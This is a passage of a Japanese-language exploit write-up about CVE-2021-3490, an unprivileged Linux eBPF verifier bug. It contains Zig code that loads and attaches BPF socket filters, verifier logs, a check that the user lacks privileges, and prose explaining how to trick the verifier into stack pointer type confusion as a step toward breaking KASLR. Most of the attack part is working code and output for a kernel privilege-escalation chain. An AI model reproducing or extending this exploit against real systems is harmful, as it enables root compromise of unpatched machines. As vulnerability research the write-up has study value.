�[1m�[37m �[0m�[33m"eviliam"�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33m"goodiam"�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33m"Lorem ipsum dolor sit amet, consectetur adipiscing elit."�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mbuf�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37m[�[0m�[1m�[36m0x100�[0m�[1m�[37m]�[0m�[1m�[36mu8�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mundefined�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mfor�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[37mpackets�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36m|�[0m�[1m�[37mp�[0m�[1m�[36m|�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m_�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37mwrite�[0m�[1m�[37m(�[0m�[1m�[37msocks�[0m�[1m�[37m[�[0m�[1m�[36m1�[0m�[1m�[37m],�[0m�[1m�[37m �[0m�[1m�[37mp�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mn_read�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37mread�[0m�[1m�[37m(�[0m�[1m�[37msocks�[0m�[1m�[37m[�[0m�[1m�[36m0�[0m�[1m�[37m],�[0m�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37mbuf�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[33mcatch�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mlog�[0m�[1m�[37m.�[0m�[37minfo�[0m�[1m�[37m(�[0m�[33m"Sent '{s}', received '{s}'"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.{�[0m�[1m�[37m �[0m�[1m�[37mp�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mbuf�[0m�[1m�[37m[�[0m�[1m�[36m0�[0m�[1m�[37m..�[0m�[1m�[37mn_read�[0m�[1m�[37m]�[0m�[1m�[37m �[0m�[1m�[37m});�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mpub�[0m�[1m�[37m �[0m�[33mfn�[0m�[1m�[37m �[0m�[37mmain�[0m�[1m�[37m()�[0m�[1m�[37m �[0m�[1m�[36m!�[0m�[1m�[36mvoid�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[37mexample1�[0m�[1m�[37m();�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[37mexample2�[0m�[1m�[37m();�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[37mexample3�[0m�[1m�[37m();�[0m�[1m�[37m�[0m
�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m---(BPF Example 1)---�[0m
�[1m�[37m[INFO] Sent 'Hello', received 'Hell'�[0m
�[1m�[37m[INFO] BPF Verifier output:�[0m
�[1m�[37mfunc#0 @0�[0m
�[1m�[37m0: R1=ctx(off=0,imm=0) R10=fp0�[0m
�[1m�[37m0: (b7) r0 = 4 ; R0_w=4�[0m
�[1m�[37m1: (95) exit�[0m
�[1m�[37mprocessed 2 insns (limit 1000000) max_states_per_insn 0 total_states 0 peak_states 0 mark_read 0�[0m
�[1m�[37m�[0m
�[1m�[37m---(BPF Example 2)---�[0m
�[1m�[37m[INFO] BPF_map[1] = 0xbebafecabebafeca�[0m
�[1m�[37m[INFO] BPF_map[1] = 0x1337�[0m
�[1m�[37m[INFO] BPF Verifier output:�[0m
�[1m�[37mfunc#0 @0�[0m
�[1m�[37m0: R1=ctx(off=0,imm=0) R10=fp0�[0m
�[1m�[37m0: (7a) *(u64 *)(r10 -8) = 1 ; R10=fp0 fp-8_w=mmmmmmmm�[0m
�[1m�[37m1: (7a) *(u64 *)(r10 -16) = 4919 ; R10=fp0 fp-16_w=mmmmmmmm�[0m
�[1m�[37m2: (18) r1 = 0xffff892b83b2b800 ; R1_w=map_ptr(off=0,ks=4,vs=8,imm=0)�[0m
�[1m�[37m4: (bf) r2 = r10 ; R2_w=fp0 R10=fp0�[0m
�[1m�[37m5: (07) r2 += -8 ; R2_w=fp-8�[0m
�[1m�[37m6: (bf) r3 = r2 ; R2_w=fp-8 R3_w=fp-8�[0m
�[1m�[37m7: (07) r3 += -8 ; R3_w=fp-16�[0m
�[1m�[37m8: (b7) r4 = 0 ; R4_w=0�[0m
�[1m�[37m9: (85) call bpf_map_update_elem#2 ; R0_w=scalar()�[0m
�[1m�[37m10: (b7) r0 = 0 ; R0_w=0�[0m
�[1m�[37m11: (95) exit�[0m
�[1m�[37mprocessed 11 insns (limit 1000000) max_states_per_insn 0 total_states 0 peak_states 0 mark_read 0�[0m
�[1m�[37m�[0m
�[1m�[37m---(BPF Example 3)---�[0m
�[1m�[37m[INFO] Sent 'a', received 'a'�[0m
�[1m�[37m[INFO] Sent 'aaaa', received 'evil'�[0m
�[1m�[37m[INFO] Sent 'imevil', received ''�[0m
�[1m�[37m[INFO] Sent 'eviliam', received ''�[0m
�[1m�[37m[INFO] Sent 'goodiam', received 'eviliam'�[0m
�[1m�[37m[INFO] Sent 'Lorem ipsum dolor sit amet, consectetur adipiscing elit.', received 'evilm ipsum dolor sit amet, consectetur adipiscing elit.'�[0m
eBPFはかなり強力だが、不権利ユーザーで使える関数は少ない(当然だ)。
でもいくつかの関数は使えるはずだが、どういうわけか使えできなっかた(例えば�[40m�[35m`bpf_get_current_ta
sk`�[39m�[49m)。
=== �[1m�[4mCVE-2021-3490�[22m�[24m
このパーチは�[40m`src`�[49mと�[40m`dst`�[49mが知る場合は�[40m�[35m`__mark_r
eg32_known`�[39m�[49mを呼び出しない。
説明はちょっと複雑ので、chompieさん [8]やptr-yudaiさん [9]に譲ることとする。
概略はとあるレジースタの値についてBPFの検証機は最小値が1,最大値値は1,ですが本当の値は2.
「BPFマップやBPFスタック、コンテキストのアドレスをリークせずに」悪用したいんだから、多くの方法排除した。
�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mBPF�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mlinux�[0m�[1m�[37m.�[0m�[1m�[37mBPF�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mAF�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mlinux�[0m�[1m�[37m.�[0m�[1m�[37mAF�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mSOCK�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mlinux�[0m�[1m�[37m.�[0m�[1m�[37mSOCK�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mSOL�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mlinux�[0m�[1m�[37m.�[0m�[1m�[37mSOL�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mSO�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mlinux�[0m�[1m�[37m.�[0m�[1m�[37mSO�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33m// broken in 0.14.1�[0m
�[33mfn�[0m�[1m�[37m �[0m�[37m_ld_dw1�[0m�[1m�[37m(�[0m�[1m�[37mdst�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37mBPF�[0m�[1m�[37m.�[0m�[1m�[37mInsn�[0m�[1m�[37m.�[0m�[1m�[37mReg�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mimm�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mu64�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[37mBPF�[0m�[1m�[37m.�[0m�[1m�[37mInsn�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mreturn�[0m�[1m�[37m �[0m�[1m�[37m.{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mcode�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mBPF�[0m�[1m�[37m.�[0m�[1m�[37mLD�[0m�[1m�[37m �[0m�[1m�[36m|�[0m�[1m�[37m �[0m�[1m�[37mBPF�[0m�[1m�[37m.�[0m�[1m�[37mDW�[0m�[1m�[37m �[0m�[1m�[36m|�[0m�[1m�[37m �[0m�[1m�[37mBPF�[0m�[1m�[37m.�[0m�[1m�[37mIMM�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mdst�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[37m@intFromEnum�[0m�[1m�[37m(�[0m�[1m�[37mdst�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37msrc�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[37m@intFromEnum�[0m�[1m�[37m(�[0m�[1m�[37mBPF�[0m�[1m�[37m.�[0m�[1m�[37mInsn�[0m�[1m�[37m.�[0m�[1m�[37mReg�[0m�[1m�[37m.�[0m�[1m�[37mr0�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37moff�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mimm�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[37m@as�[0m�[1m�[37m(�[0m�[1m�[36mi32�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[37m@bitCast�[0m�[1m�[37m(�[0m�[37m@as�[0m�[1m�[37m(�[0m�[1m�[36mu32�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[37m@truncate�[0m�[1m�[37m(�[0m�[1m�[37mimm�[0m�[1m�[37m)))),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m}�[0m�[1m�[37m�[0m
�[33mfn�[0m�[1m�[37m �[0m�[37m_ld_dw2�[0m�[1m�[37m(�[0m�[1m�[37mimm�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mu64�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[37mBPF�[0m�[1m�[37m.�[0m�[1m�[37mInsn�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mreturn�[0m�[1m�[37m �[0m�[1m�[37m.{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mcode�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mdst�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37msrc�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37moff�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mimm�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[37m@as�[0m�[1m�[37m(�[0m�[1m�[36mi32�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[37m@bitCast�[0m�[1m�[37m(�[0m�[37m@as�[0m�[1m�[37m(�[0m�[1m�[36mu32�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[37m@truncate�[0m�[1m�[37m(�[0m�[1m�[37mimm�[0m�[1m�[37m �[0m�[1m�[36m>>�[0m�[1m�[37m �[0m�[1m�[36m32�[0m�[1m�[37m)))),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mfn�[0m�[1m�[37m �[0m�[37mbpf_helper�[0m�[1m�[37m(�[0m�[1m�[37mmapfd�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[1m�[37mfd_t�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37minsns�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37m[]�[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mBPF�[0m�[1m�[37m.�[0m�[1m�[37mInsn�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37minput�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37m[]�[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[36mu8�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36m!�[0m�[1m�[36mvoid�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[1m�[37mBPF�[0m�[1m�[37m.�[0m�[37mmap_update_elem�[0m�[1m�[37m(�[0m�[1m�[37mmapfd�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mmem�[0m�[1m�[37m.�[0m�[37mtoBytes�[0m�[1m�[37m(�[0m�[37m@as�[0m�[1m�[37m(�[0m�[1m�[36mi32�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m)),�[0m�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37m.{�[0m�[1m�[36m1�[0m�[1m�[37m},�[0m�[1m�[37m �[0m�[1m�[37mBPF�[0m�[1m�[37m.�[0m�[1m�[37mANY�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mverifier_log�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37m[�[0m�[1m�[36m0x20000�[0m�[1m�[37m]�[0m�[1m�[36mu8�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mundefined�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mlog�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mBPF�[0m�[1m�[37m.�[0m�[1m�[37mLog�[0m�[1m�[37m{�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mbuf�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37mverifier_log�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mlevel�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m2�[0m�[1m�[37m �[0m�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33merrdefer�[0m�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mlog�[0m�[1m�[37m.�[0m�[37merr�[0m�[1m�[37m(�[0m�[33m"BPF Verifier output:�[0m�[33m\n�[0m�[33m{s}"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.{�[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mmem�[0m�[1m�[37m.�[0m�[37msliceTo�[0m�[1m�[37m(�[0m�[1m�[36m&�[0m�[1m�[37mverifier_log�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m)});�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mprogfd�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[1m�[37mBPF�[0m�[1m�[37m.�[0m�[37mprog_load�[0m�[1m�[37m(.�[0m�[1m�[37msocket_filter�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37minsns�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37mlog�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[33m"GPL v3"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mvar�[0m�[1m�[37m �[0m�[1m�[37msocks�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37m[�[0m�[1m�[36m2�[0m�[1m�[37m]�[0m�[1m�[37mlinux�[0m�[1m�[37m.�[0m�[1m�[37mfd_t�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mundefined�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mswitch�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37merrno�[0m�[1m�[37m(�[0m�[1m�[37mlinux�[0m�[1m�[37m.�[0m�[37msocketpair�[0m�[1m�[37m(�[0m�[1m�[37mAF�[0m�[1m�[37m.�[0m�[1m�[37mUNIX�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mSOCK�[0m�[1m�[37m.�[0m�[1m�[37mDGRAM�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37msocks�[0m�[1m�[37m)))�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mSUCCESS�[0m�[1m�[37m �[0m�[1m�[36m=>�[0m�[1m�[37m �[0m�[1m�[37m{},�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33melse�[0m�[1m�[37m �[0m�[1m�[36m=>�[0m�[1m�[37m �[0m�[1m�[36m|�[0m�[1m�[37me�[0m�[1m�[36m|�[0m�[1m�[37m �[0m�[33mreturn�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37munexpectedErrno�[0m�[1m�[37m(�[0m�[1m�[37me�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mswitch�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37merrno�[0m�[1m�[37m(�[0m�[1m�[37mlinux�[0m�[1m�[37m.�[0m�[37msetsockopt�[0m�[1m�[37m(�[0m�[1m�[37msocks�[0m�[1m�[37m[�[0m�[1m�[36m0�[0m�[1m�[37m],�[0m�[1m�[37m �[0m�[1m�[37mSOL�[0m�[1m�[37m.�[0m�[1m�[37mSOCKET�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mSO�[0m�[1m�[37m.�[0m�[1m�[37mATTACH_BPF�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mmem�[0m�[1m�[37m.�[0m�[37masBytes�[0m�[1m�[37m(�[0m�[1m�[36m&�[0m�[1m�[37mprogfd�[0m�[1m�[37m),�[0m�[1m�[37m �[0m�[1m�[36m4�[0m�[1m�[37m)))�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mSUCCESS�[0m�[1m�[37m �[0m�[1m�[36m=>�[0m�[1m�[37m �[0m�[1m�[37m{},�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33melse�[0m�[1m�[37m �[0m�[1m�[36m=>�[0m�[1m�[37m �[0m�[1m�[36m|�[0m�[1m�[37me�[0m�[1m�[36m|�[0m�[1m�[37m �[0m�[33mreturn�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37munexpectedErrno�[0m�[1m�[37m(�[0m�[1m�[37me�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m_�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37mwrite�[0m�[1m�[37m(�[0m�[1m�[37msocks�[0m�[1m�[37m[�[0m�[1m�[36m1�[0m�[1m�[37m],�[0m�[1m�[37m �[0m�[1m�[37minput�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mfn�[0m�[1m�[37m �[0m�[37mconfirm_unpriviledged_bpf�[0m�[1m�[37m()�[0m�[1m�[37m �[0m�[1m�[36m!�[0m�[1m�[36mvoid�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33m// demonstrate that we don't have CAP_BPF or CAP_SYS_ADMIN by confirming that we can't load a BPF program that requires elevated capabilities.�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37minsns�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37m[�[0m�[1m�[37m_�[0m�[1m�[37m]�[0m�[1m�[37mBPF�[0m�[1m�[37m.�[0m�[1m�[37mInsn�[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mcode�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mBPF�[0m�[1m�[37m.�[0m�[1m�[37mCALL�[0m�[1m�[37m �[0m�[1m�[36m|�[0m�[1m�[37m �[0m�[1m�[37mBPF�[0m�[1m�[37m.�[0m�[1m�[37mJMP�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mdst�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37msrc�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m1�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37moff�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mimm�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m2�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m},�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mmov�[0m�[1m�[37m(.�[0m�[1m�[37mr0�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mexit�[0m�[1m�[37m(),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m}�[0m�[1m�[37m �[0m�[1m�[36m++�[0m�[1m�[37m �[0m�[1m�[37m[�[0m�[1m�[37m_�[0m�[1m�[37m]�[0m�[1m�[37mBPF�[0m�[1m�[37m.�[0m�[1m�[37mInsn�[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mmov�[0m�[1m�[37m(.�[0m�[1m�[37mr0�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mexit�[0m�[1m�[37m(),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mif�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[37mBPF�[0m�[1m�[37m.�[0m�[37mprog_load�[0m�[1m�[37m(.�[0m�[1m�[37msocket_filter�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37minsns�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36mnull�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[33m"GPL v3"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m))�[0m�[1m�[37m �[0m�[1m�[36m|�[0m�[1m�[37m_�[0m�[1m�[36m|�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mlog�[0m�[1m�[37m.�[0m�[37mwarn�[0m�[1m�[37m(�[0m�[33m"User is bpf_capable! (Are you running this as root?)"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.{});�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m}�[0m�[1m�[37m �[0m�[33melse�[0m�[1m�[37m �[0m�[1m�[36m|�[0m�[1m�[37merr�[0m�[1m�[36m|�[0m�[1m�[37m �[0m�[33mswitch�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[37merr�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33merror�[0m�[1m�[37m.�[0m�[1m�[37mAccessDenied�[0m�[1m�[37m �[0m�[1m�[36m=>�[0m�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mlog�[0m�[1m�[37m.�[0m�[37minfo�[0m�[1m�[37m(�[0m�[33m"User is not bpf_capable"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.{}),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33melse�[0m�[1m�[37m �[0m�[1m�[36m=>�[0m�[1m�[37m �[0m�[33mreturn�[0m�[1m�[37m �[0m�[1m�[37merr�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m}�[0m�[1m�[37m�[0m
==== �[1m�[4m型混同プリミティブ�[22m�[24m
型混同とは検証機にとあるレジスタは型アを納得する、でも本当は型イ。
普通なら簡単に�[40m`r10`�[49mに前述悪用なレジスタを加算する、だが一般ユーザなのでALU
sanitizationは有効、そしてポインタ加減算はそう簡単にならない。
�[40m�[35m`skb_load_bytes`�[39m�[49mを使えばオバーフローできるし、偶然天才的な発想を考えた:アド
レスの最後バイトを0x00にするとアドレスに[0,255] に引き算するは同じじゃねかッと思った。
この方法でeBPFの検証機を騙す、�[40m`r1`�[49mが�[40m`r10-
0x18`�[49mである認識させるだが実際に�[40m`r10-
0x20`�[49mであること:�[40m`r1`�[49mにロードをするば「型混同」はできる。
そういうわけでどうやってKASLRを破る?
